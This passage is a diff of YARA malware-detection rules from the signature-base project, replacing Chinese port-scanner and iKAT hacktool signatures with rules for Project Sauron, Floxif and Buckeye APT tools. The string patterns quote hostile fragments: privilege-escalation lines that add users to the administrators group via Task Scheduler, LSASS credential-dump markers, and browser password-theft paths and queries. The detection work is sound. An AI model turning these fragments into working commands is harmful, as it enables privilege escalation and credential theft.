-		logic_hash = "ffb1f653fd536a46dae4bf2c91c3c0582b703b8f0d33838b9736083e307a8e79"
-		score = 60
+		logic_hash = "90cfb58017d62312c56908aca1a48bb7425f5cd51540298ecf65305b46ffb2c8"
+		score = 75
 		quality = 85
 		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "IEXT2_IDC_HORZLINEMOVECURSOR" fullword wide
-		$s1 = "msctls_progress32" fullword wide
-		$s2 = "Reply-To: %s" fullword ascii
-		$s3 = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)" fullword ascii
-		$s4 = "html htm htx asp" fullword ascii
+		$x1 = "64, 64url, 32, 32url or 16."
+		$s2 = "Force decoding when input is invalid/corrupt"
+		$s3 = "This cruft"
 
 	condition:
-		all of them
+		$x1 or 2 of them
 }
-rule SIGNATURE_BASE_CN_Hacktool_BAT_Portsopen
+rule SIGNATURE_BASE_APT_Project_Sauron_Dext_Module
 {
 	meta:
-		description = "Detects a chinese BAT hacktool for local port evaluation"
+		description = "Detects strings from dext module - Project Sauron report by Kaspersky"
 		author = "Florian Roth (Nextron Systems)"
-		id = "55c3f678-ba70-5a4a-b288-9d0953eff968"
-		date = "2014-12-10"
-		modified = "2025-12-18"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L598-L612"
+		id = "d69373e0-d6ad-5475-8766-06e865620ed8"
+		date = "2016-08-08"
+		modified = "2023-12-05"
+		reference = "https://goo.gl/eFoP4A"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_project_sauron_extras.yar#L89-L104"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "e5bc7b3264d7fc63fcc6c3d7e45859eb83b8ce60bd9a918f5eff887f626d09a3"
-		score = 60
+		logic_hash = "7dbfb3ddfffa6fa65800e07fdcc527650474740afa658567efe46830587cedae"
+		score = 75
 		quality = 85
 		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "for /f \"skip=4 tokens=2,5\" %%a in ('netstat -ano -p TCP') do (" ascii
-		$s1 = "in ('tasklist /fi \"PID eq %%b\" /FO CSV') do " ascii
-		$s2 = "@echo off" ascii
+		$x1 = "Assemble rows of DNS names back to a single string of data"
+		$x2 = "removes checks of DNS names and lengths (during split)"
+		$x3 = "Randomize data lengths (length/2 to length)"
+		$x4 = "This cruft"
 
 	condition:
-		all of them
+		2 of them
 }
-rule SIGNATURE_BASE_CN_Hacktool_Ssport_Portscanner
+rule SIGNATURE_BASE_Hacktool_This_Cruft : FILE
 {
 	meta:
-		description = "Detects a chinese Portscanner named SSPort"
+		description = "Detects string 'This cruft' often used in hack tools like netcat or cryptcat and also mentioned in Project Sauron report"
 		author = "Florian Roth (Nextron Systems)"
-		id = "38cc8830-efd3-51b7-8ac6-c9bf468212cb"
-		date = "2014-12-10"
-		modified = "2025-12-18"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L614-L628"
+		id = "a39de541-19b5-5b7e-a3dc-51a5309181e5"
+		date = "2016-08-08"
+		modified = "2023-12-05"
+		reference = "https://goo.gl/eFoP4A"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_project_sauron_extras.yar#L106-L119"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "30c380b6c683cbcbef7072e793d94e1782206b844fa23d334b737818f0a32f9f"
-		score = 70
+		logic_hash = "875c34e8048c3f98afc97683d0b3086c3396753cd9fb14bc68681c63ed77fd51"
+		score = 60
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "Golden Fox" fullword wide
-		$s1 = "Syn Scan Port" fullword wide
-		$s2 = "CZ88.NET" fullword wide
+		$x1 = "This cruft" fullword
 
 	condition:
-		all of them
+		( uint16( 0 ) == 0x5a4d and filesize < 200KB and $x1 )
 }
-rule SIGNATURE_BASE_CN_Hacktool_Scanport_Portscanner
+rule SIGNATURE_BASE_APT_Project_Sauron_Custom_M1 : FILE
 {
 	meta:
-		description = "Detects a chinese Portscanner named ScanPort"
+		description = "Detects malware from Project Sauron APT"
 		author = "Florian Roth (Nextron Systems)"
-		id = "a708283e-339c-599f-9321-3b063d0076a9"
-		date = "2014-12-10"
-		modified = "2025-12-18"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L630-L644"
+		id = "c741bd7d-1885-55f1-a5b3-8f00fda2fe39"
+		date = "2016-08-09"
+		modified = "2023-12-05"
+		reference = "https://goo.gl/eFoP4A"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_project_sauron_extras.yar#L130-L148"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "fa2dce57cc3e9baecb80b0165dfeb1af1ba4c4b30098e3b1252eb98b4fc30f7f"
-		score = 70
-		quality = 60
-		tags = ""
+		logic_hash = "c81c996e487bdd840111513724ccf1220ee3bd8280d776aa4c128ef5263ee136"
+		score = 75
+		quality = 85
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "9572624b6026311a0e122835bcd7200eca396802000d0777dba118afaaf9f2a9"
 
 	strings:
-		$s0 = "LScanPort" fullword wide
-		$s1 = "LScanPort Microsoft" fullword wide
-		$s2 = "www.yupsoft.com" fullword wide
+		$s1 = "ncnfloc.dll" fullword wide
+		$s4 = "Network Configuration Locator" fullword wide
+		$op0 = { 80 75 6e 85 c0 79 6a 66 41 83 38 0a 75 63 0f b7 }
+		$op1 = { 80 75 29 85 c9 79 25 b9 01 }
+		$op2 = { 2b d8 48 89 7c 24 38 44 89 6c 24 40 83 c3 08 89 }
 
 	condition:
-		all of them
+		( uint16( 0 ) == 0x5a4d and filesize < 200KB and ( all of ( $s* ) ) and 1 of ( $op* ) ) or ( all of them )
 }
-rule SIGNATURE_BASE_CN_Hacktool_S_EXE_Portscanner
+rule SIGNATURE_BASE_APT_Project_Sauron_Custom_M2 : FILE
 {
 	meta:
-		description = "Detects a chinese Portscanner named s.exe"
+		description = "Detects malware from Project Sauron APT"
 		author = "Florian Roth (Nextron Systems)"
-		id = "d6b35d4f-7e25-50dd-bef2-08f7033312e8"
-		date = "2014-12-10"
-		modified = "2025-12-18"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L646-L660"
+		id = "79abe5f2-a750-5018-a67f-6ee1c51a2ca1"
+		date = "2016-08-09"
+		modified = "2023-12-05"
+		reference = "https://goo.gl/eFoP4A"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_project_sauron_extras.yar#L150-L167"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "658ae90f3af3c7abec6e692b6be350939ba7b654a9972d1a1016ff33e815a1de"
-		score = 70
+		logic_hash = "57099a802ee62a5183156f0b30713553b6fd83bbb5e1b453e9b25da0109b8777"
+		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "30a824155603c2e9d8bfd3adab8660e826d7e0681e28e46d102706a03e23e3a8"
 
 	strings:
-		$s0 = "\\Result.txt" ascii
-		$s1 = "By:ZT QQ:376789051" fullword ascii
-		$s2 = "(http://www.eyuyan.com)" fullword wide
+		$s2 = "\\*\\3vpn" ascii
+		$op0 = { 55 8b ec 83 ec 0c 53 56 33 f6 39 75 08 57 89 75 }
+		$op1 = { 59 59 c3 8b 65 e8 ff 75 88 ff 15 50 20 40 00 ff }
+		$op2 = { 8b 4f 06 85 c9 74 14 83 f9 12 0f 82 a7 }
 
 	condition:
-		all of them
+		( uint16( 0 ) == 0x5a4d and filesize < 400KB and ( all of ( $s* ) ) and all of ( $op* ) )
 }
-rule SIGNATURE_BASE_CN_Hacktool_Milkt_BAT
+rule SIGNATURE_BASE_APT_Project_Sauron_Custom_M3 : FILE
 {
 	meta:
-		description = "Detects a chinese Portscanner named MilkT - shipped BAT"
+		description = "Detects malware from Project Sauron APT"
 		author = "Florian Roth (Nextron Systems)"
-		id = "d680a5f1-6182-5bc8-99de-c3cba1a61903"
-		date = "2014-12-10"
-		modified = "2025-12-18"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L662-L675"
+		id = "555b37a2-6a3c-539f-81dc-24c739795510"
+		date = "2016-08-09"
+		modified = "2023-12-05"
+		reference = "https://goo.gl/eFoP4A"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_project_sauron_extras.yar#L169-L186"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "ad74c45db0ef52223eb4dd162a21c57074a4ecb869a841d836d14afc997a7478"
-		score = 70
+		logic_hash = "739414990d112dd16e01831408ba745b04fae7621eb9074f73babbc40b69e1ad"
+		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "a4736de88e9208eb81b52f29bab9e7f328b90a86512bd0baadf4c519e948e5ec"
 
 	strings:
-		$s0 = "for /f \"eol=P tokens=1 delims= \" %%i in (s1.txt) do echo %%i>>s2.txt" ascii
-		$s1 = "if not \"%Choice%\"==\"\" set Choice=%Choice:~0,1%" ascii
+		$s1 = "ExampleProject.dll" fullword ascii
+		$op0 = { 8b 4f 06 85 c9 74 14 83 f9 13 0f 82 ba }
+		$op1 = { ff 15 34 20 00 10 85 c0 59 a3 60 30 00 10 75 04 }
+		$op2 = { 55 8b ec ff 4d 0c 75 09 ff 75 08 ff 15 00 20 00 }
 
 	condition:
-		all of them
+		( uint16( 0 ) == 0x5a4d and filesize < 1000KB and ( all of ( $s* ) ) and all of ( $op* ) )
 }
-rule SIGNATURE_BASE_CN_Hacktool_Milkt_Scanner
+rule SIGNATURE_BASE_APT_Project_Sauron_Custom_M4 : FILE
 {
 	meta:
-		description = "Detects a chinese Portscanner named MilkT"
+		description = "Detects malware from Project Sauron APT"
 		author = "Florian Roth (Nextron Systems)"
-		id = "aa83c983-25c2-5051-88a1-fbc70d947d6e"
-		date = "2014-12-10"
-		modified = "2025-12-18"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L677-L695"
+		id = "32717ace-ff56-5b5b-8ed9-4bb353886eea"
+		date = "2016-08-09"
+		modified = "2023-12-05"
+		reference = "https://goo.gl/eFoP4A"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_project_sauron_extras.yar#L188-L206"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "707cbd625b5694b710d01622a053e60828da7f70b38e43012d04364137583fe9"
-		score = 60
+		logic_hash = "0735ba9591a9cf06cd13ba480b4559ef83105ab08ffcec21ebbbfdf3766edb93"
+		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "e12e66a6127cfd2cbb42e6f0d57c9dd019b02768d6f1fb44d91f12d90a611a57"
 
 	strings:
-		$s0 = "Bf **************" ascii fullword
-		$s1 = "forming Time: %d/" ascii
-		$s2 = "KERNEL32.DLL" ascii fullword
-		$s3 = "CRTDLL.DLL" ascii fullword
-		$s4 = "WS2_32.DLL" ascii fullword
-		$s5 = "GetProcAddress" ascii fullword
-		$s6 = "atoi" ascii fullword
+		$s1 = "xpsmngr.dll" fullword wide
+		$s2 = "XPS Manager" fullword wide
+		$op0 = { 89 4d e8 89 4d ec 89 4d f0 ff d2 3d 08 00 00 c6 }
+		$op1 = { 55 8b ec ff 4d 0c 75 09 ff 75 08 ff 15 04 20 5b }
+		$op2 = { 8b 4f 06 85 c9 74 14 83 f9 13 0f 82 b6 }
 
 	condition:
-		all of them
+		( uint16( 0 ) == 0x5a4d and filesize < 90KB and ( all of ( $s* ) ) and 1 of ( $op* ) ) or ( all of them )
 }
-rule SIGNATURE_BASE_CN_Hacktool_1433_Scanner : FILE
+rule SIGNATURE_BASE_APT_Project_Sauron_Custom_M6 : FILE
 {
 	meta:
-		description = "Detects a chinese MSSQL scanner"
+		description = "Detects malware from Project Sauron APT"
 		author = "Florian Roth (Nextron Systems)"
-		id = "77712d29-1a32-59e7-999a-a2ef02212886"
-		date = "2014-12-10"
-		modified = "2025-12-18"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L697-L714"
+		id = "1aa6dd43-52ac-5321-9941-767833073c37"
+		date = "2016-08-09"
+		modified = "2023-12-05"
+		reference = "https://goo.gl/eFoP4A"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_project_sauron_extras.yar#L208-L226"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "3e51e3596fc90bcea46236728da5437a9b6f56a42d64a651940321f575b32129"
-		score = 40
+		logic_hash = "95ca9a0b2e71e7152d20a01d238e7362024c6dac6fc95ed2ebfa96dcbc8dbd40"
+		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "3782b63d7f6f688a5ccb1b72be89a6a98bb722218c9f22402709af97a41973c8"
 
 	strings:
-		$s0 = "1433" wide fullword
-		$s1 = "1433V" wide
-		$s2 = "del Weak1.txt" ascii fullword
-		$s3 = "del Attack.txt" ascii fullword
-		$s4 = "del /s /Q C:\\Windows\\system32\\doors\\" ascii
-		$s5 = "!&start iexplore http://www.crsky.com/soft/4818.html)" fullword ascii
+		$s1 = "rseceng.dll" fullword wide
+		$s2 = "Remote Security Engine" fullword wide
+		$op0 = { 8b 0d d5 1d 00 00 85 c9 0f 8e a2 }
+		$op1 = { 80 75 6e 85 c0 79 6a 66 41 83 38 0a 75 63 0f b7 }
+		$op2 = { 80 75 29 85 c9 79 25 b9 01 }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and all of ( $s* )
+		( uint16( 0 ) == 0x5a4d and filesize < 200KB and ( all of ( $s* ) ) and 1 of ( $op* ) ) or ( all of them )
 }
-rule SIGNATURE_BASE_CN_Hacktool_1433_Scanner_Comp2 : FILE
+rule SIGNATURE_BASE_APT_Project_Sauron_Custom_M7 : FILE
 {
 	meta:
-		description = "Detects a chinese MSSQL scanner - component 2"
+		description = "Detects malware from Project Sauron APT"
 		author = "Florian Roth (Nextron Systems)"
-		id = "7d707be5-dad0-5d91-965b-908a8603b6c0"
-		date = "2014-12-10"
-		modified = "2025-12-18"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L716-L730"
+		id = "c5e83e1a-872d-53b3-a74a-b1a9b4a89168"
+		date = "2016-08-09"
+		modified = "2023-12-05"
+		reference = "https://goo.gl/eFoP4A"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_project_sauron_extras.yar#L228-L261"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "7c84d59a821531d9e741a05a23a911bb1caa825a18bb6532381e5ff38193c260"
-		score = 40
+		logic_hash = "d132ddeb1d26b035565d3707b73d401fb413315febe26ac291cb05bfeca7c41d"
+		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "6c8c93069831a1b60279d2b316fd36bffa0d4c407068dbef81b8e2fe8fd8e8cd"
+		hash2 = "7cc0bf547e78c8aaf408495ceef58fa706e6b5d44441fefdce09d9f06398c0ca"
 
 	strings:
-		$s0 = "1433" wide fullword
-		$s1 = "1433V" wide
-		$s2 = "UUUMUUUfUUUfUUUfUUUfUUUfUUUfUUUfUUUfUUUfUUUfUUUMUUU" ascii fullword
+		$sx1 = "Default user" fullword wide
+		$sx2 = "Hincorrect header check" fullword ascii
+		$sa1 = "MSAOSSPC.dll" fullword ascii
+		$sa2 = "MSAOSSPC.DLL" fullword wide
+		$sa3 = "MSAOSSPC" fullword wide
+		$sa4 = "AOL Security Package" fullword wide
+		$sa5 = "AOL Security Package" fullword wide
+		$sa6 = "AOL Client for 32 bit platforms" fullword wide
+		$op0 = { 8b ce 5b e9 4b ff ff ff 55 8b ec 51 53 8b 5d 08 }
+		$op1 = { e8 0a fe ff ff 8b 4d 14 89 46 04 89 41 04 8b 45 }
+		$op2 = { e9 29 ff ff ff 83 7d fc 00 0f 84 cf 0a 00 00 8b }
+		$op3 = { 83 f8 0c 0f 85 3a 01 00 00 44 2b 41 6c 41 8b c9 }
+		$op4 = { 44 39 57 0c 0f 84 d6 0c 00 00 44 89 6f 18 45 89 }
+		$op5 = { c1 ed 02 83 c6 fe e9 68 fe ff ff 44 39 57 08 75 }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and all of ( $s* )
+		uint16( 0 ) == 0x5a4d and filesize < 200KB and ( ( 3 of ( $s* ) and 3 of ( $op* ) ) or ( 1 of ( $sx* ) and 1 of ( $sa* ) ) )
 }
-rule SIGNATURE_BASE_WCE_Modified_1_1014
+rule SIGNATURE_BASE_Malware_Floxif_Mpsvc_Dll : HIGHVOL FILE
 {
 	meta:
-		description = "Modified (packed) version of Windows Credential Editor"
+		description = "Malware - Floxif"
 		author = "Florian Roth (Nextron Systems)"
-		id = "536d1a7f-bda1-5c22-bf72-a177468e7c42"
-		date = "2016-02-15"
-		modified = "2025-12-18"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L732-L746"
+		id = "37af366a-24b2-5402-b0b5-6e2c80f8c903"
+		date = "2017-04-07"
+		modified = "2023-12-05"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_floxif.yar#L2-L17"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "09a412ac3c85cedce2642a19e99d8f903a2e0354"
-		logic_hash = "f094d635aabea9b9101fad3d0d23ad37692317ae5b4f636296ee612752c4421f"
-		score = 70
+		logic_hash = "e51258558dfd9a2c65589100a224492f4582067484c99d405b2d432a48cc6ed8"
+		score = 75
 		quality = 85
-		tags = ""
+		tags = "HIGHVOL, FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "1e654ee1c4736f4ccb8b5b7aa604782cfb584068df4d9e006de8009e60ab5a14"
 
 	strings:
-		$s0 = "LSASS.EXE" fullword ascii
-		$s1 = "_CREDS" ascii
-		$s9 = "Using WCE " ascii
+		$op1 = { 04 80 7a 03 01 75 04 8d 42 04 c3 8d 42 04 53 8b }
+		$op2 = { 88 19 74 03 41 eb ea c6 42 03 01 5b c3 8b 4c 24 }
+		$op3 = { ff 03 8d 00 f9 ff ff 88 01 eb a1 }
 
 	condition:
-		all of them
+		( uint16( 0 ) == 0x5a4d and filesize < 1000KB and all of them )
 }
-rule SIGNATURE_BASE_Ikat_Wmi_Rundll : FILE
+rule SIGNATURE_BASE_HKTL_Buckeye_Osinfo : FILE
 {
 	meta:
-		description = "This exe will attempt to use WMI to Call the Win32_Process event to spawn rundll - file wmi_rundll.exe"
+		description = "Detects OSinfo tool used by the Buckeye APT group"
 		author = "Florian Roth (Nextron Systems)"
-		id = "e3d80c95-d333-53cf-8165-b3a1e66ed00d"
-		date = "2014-05-11"
-		modified = "2025-12-18"
-		reference = "http://ikat.ha.cked.net/Windows/functions/ikatfiles.html"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L767-L788"
+		id = "e40a86d1-fd1a-5430-b7b7-8cc7ca128cc5"
+		date = "2016-09-05"
+		modified = "2025-03-19"
+		reference = "http://www.symantec.com/connect/blogs/buckeye-cyberespionage-group-shifts-gaze-us-hong-kong"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_buckeye.yar#L10-L29"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "97c4d4e6a644eed5aa12437805e39213e494d120"
-		logic_hash = "b857e17c790a97468ae69c8cbec6474ee38bea25bb04520516a2603996d4bd41"
-		score = 65
+		logic_hash = "782ae4293db0839190a9533d2c45baff92527867bfcd048ccae82611f165601b"
+		score = 70
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "This operating system is not supported." fullword ascii
-		$s1 = "Error!" fullword ascii
-		$s2 = "Win32 only!" fullword ascii
-		$s3 = "COMCTL32.dll" fullword ascii
-		$s4 = "[LordPE]" ascii
-		$s5 = "CRTDLL.dll" fullword ascii
-		$s6 = "VBScript" fullword ascii
-		$s7 = "CoUninitialize" fullword ascii
+		$s1 = "-s ShareInfo ShareDir" fullword ascii
+		$s2 = "-a Local And Global Group User Info" fullword ascii
+		$s3 = "-f <infile> //input server list from infile, OneServerOneLine" fullword ascii
+		$s4 = "info <\\server> <user>" fullword ascii
+		$s5 = "-c Connect Test" fullword ascii
+		$s6 = "-gd Group Domain Admins" fullword ascii
+		$s7 = "-n NetuseInfo" fullword ascii
 
 	condition:
-		all of them and filesize < 15KB
+		uint16( 0 ) == 0x5a4d and 3 of ( $s* )
 }
-rule SIGNATURE_BASE_Ikat_Revelations
+rule SIGNATURE_BASE_HKTL_Remotecmd : FILE
 {
 	meta:
-		description = "iKAT hack tool showing the content of password fields - file revelations.exe"
+		description = "Detects a remote access tool used by APT groups - file RemoteCmd.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "c5ef2c2a-c9c0-5c3a-bbcc-0b0949527850"
-		date = "2014-05-11"
-		modified = "2025-12-18"
-		reference = "http://ikat.ha.cked.net/Windows/functions/ikatfiles.html"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L790-L807"
+		id = "384f37f3-4562-5d79-9793-0384c43d4602"
+		date = "2016-09-08"
+		modified = "2022-12-21"
+		reference = "http://goo.gl/igxLyF"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_buckeye.yar#L31-L51"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "c4e217a8f2a2433297961561c5926cbd522f7996"
-		logic_hash = "0f3aa9e784beb7de8b560ecde8cc06d49e07f5e4ea4acb233ec9ac007179d7a3"
-		score = 75
-		quality = 60
-		tags = ""
+		logic_hash = "873cc02674e386577e86cb9b702265c25dd24b1f203741e8628e30c191dc99e0"
+		score = 70
+		quality = 85
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "5264d1de687432f8346617ac88ffcb31e025e43fc3da1dad55882b17b44f1f8b"
 
 	strings:
-		$s0 = "The RevelationHelper.DLL file is corrupt or missing." fullword ascii
-		$s8 = "BETAsupport@snadboy.com" fullword wide
-		$s9 = "support@snadboy.com" fullword wide
-		$s14 = "RevelationHelper.dll" fullword ascii
+		$s1 = "RemoteCmd.exe" fullword wide
+		$s2 = "\\Release\\RemoteCmd.pdb" ascii
+		$s3 = "RemoteCmd [ComputerName] [Executable] [Param1] [Param2] ..." fullword wide
+		$s4 = "http://{0}:65101/CommandEngine" fullword wide
+		$s5 = "Brenner.RemoteCmd.Client" fullword ascii
+		$s6 = "$b1888995-1ee5-4f6d-82df-d2ab8ae73d63" fullword ascii
 
 	condition:
-		all of them
+		( uint16( 0 ) == 0x5a4d and filesize < 50KB and 2 of them ) or ( 4 of them )
 }
-rule SIGNATURE_BASE_Ikat_Priv_Esc_Tasksch
+rule SIGNATURE_BASE_HKTL_Chromepass : FILE
 {
 	meta:
-		description = "Task Schedulder Local Exploit - Windows local priv-esc using Task Scheduler, published by webDevil. Supports Windows 7 and Vista."
+		description = "Detects a tool used by APT groups - file ChromePass.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "0786b313-3154-536b-b7eb-c4d8444a309f"
-		date = "2014-05-11"
-		modified = "2025-12-18"
-		reference = "http://ikat.ha.cked.net/Windows/functions/ikatfiles.html"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L809-L835"
+		id = "950b9761-bdfd-514b-90ea-a1454d35ce5a"
+		date = "2016-09-08"
+		modified = "2025-03-10"
+		reference = "http://goo.gl/igxLyF"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_buckeye.yar#L53-L77"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "84ab94bff7abf10ffe4446ff280f071f9702cf8b"
-		logic_hash = "6d0f755a758aaac4328f5f4343b424c03c2751ddad6a1dbe7c0332171c027945"
+		logic_hash = "bda90d2718be5cf9ddb95b88171c937c5fad5729aa1717a13a34a8b48dd1865c"
 		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "5ff43049ae18d03dcc74f2be4a870c7056f6cfb5eb636734cca225140029de9a"
 
 	strings:
-		$s0 = "objShell.Run \"schtasks /change /TN wDw00t /disable\",,True" fullword ascii
-		$s3 = "objShell.Run \"schtasks /run /TN wDw00t\",,True" fullword ascii
-		$s4 = "'objShell.Run \"cmd /c copy C:\\windows\\system32\\tasks\\wDw00t .\",,True" fullword ascii
-		$s6 = "a.WriteLine (\"schtasks /delete /f /TN wDw00t\")" fullword ascii
-		$s7 = "a.WriteLine (\"net user /add ikat ikat\")" fullword ascii
-		$s8 = "a.WriteLine (\"cmd.exe\")" fullword ascii
-		$s9 = "strFileName=\"C:\\windows\\system32\\tasks\\wDw00t\"" fullword ascii
-		$s10 = "For n = 1 To (Len (hexXML) - 1) step 2" fullword ascii
-		$s13 = "output.writeline \" Should work on Vista/Win7/2008 x86/x64\"" fullword ascii
-		$s11 = "Set objExecObject = objShell.Exec(\"cmd /c schtasks /query /XML /TN wDw00t\")" fullword ascii
-		$s12 = "objShell.Run \"schtasks /create /TN wDw00t /sc monthly /tr \"\"\"+biatchFile+\"" ascii
-		$s14 = "a.WriteLine (\"net localgroup administrators /add v4l\")" fullword ascii
-		$s20 = "Set ts = fso.createtextfile (\"wDw00t.xml\")" fullword ascii
+		$x1 = "\\Release\\ChromePass.pdb" ascii
+		$x2 = "Windows Protect folder for getting the encryption keys" wide
+		$x3 = "Chrome User Data folder where the password file is stored" wide
+		$s1 = "Opera Software\\Opera Stable\\Login Data" fullword wide
+		$s2 = "Yandex\\YandexBrowser\\User Data\\Default\\Login Data" fullword wide
+		$s3 = "Load the passwords from another Windows user or external drive: " fullword wide
+		$s4 = "Windows Login Password:" fullword wide
+		$s5 = "SELECT origin_url, action_url, username_element, username_value, password_element, password_value, signon_realm, date_created fr" ascii
+		$s6 = "Chrome Password Recovery" fullword wide
 
 	condition:
-		2 of them
+		( uint16( 0 ) == 0x5a4d and filesize < 700KB and 1 of ( $x* ) ) or ( 5 of them )
 }
-rule SIGNATURE_BASE_Ikat_Command_Lines_Agent
+rule SIGNATURE_BASE_Dropper_Deploysmalwareviasideloading
 {
 	meta:
-		description = "iKAT hack tools set agent - file ikat.exe"
-		author = "Florian Roth (Nextron Systems)"
-		id = "35068d59-272d-55a6-b211-2c138276914c"
-		date = "2014-05-11"
-		modified = "2025-12-18"
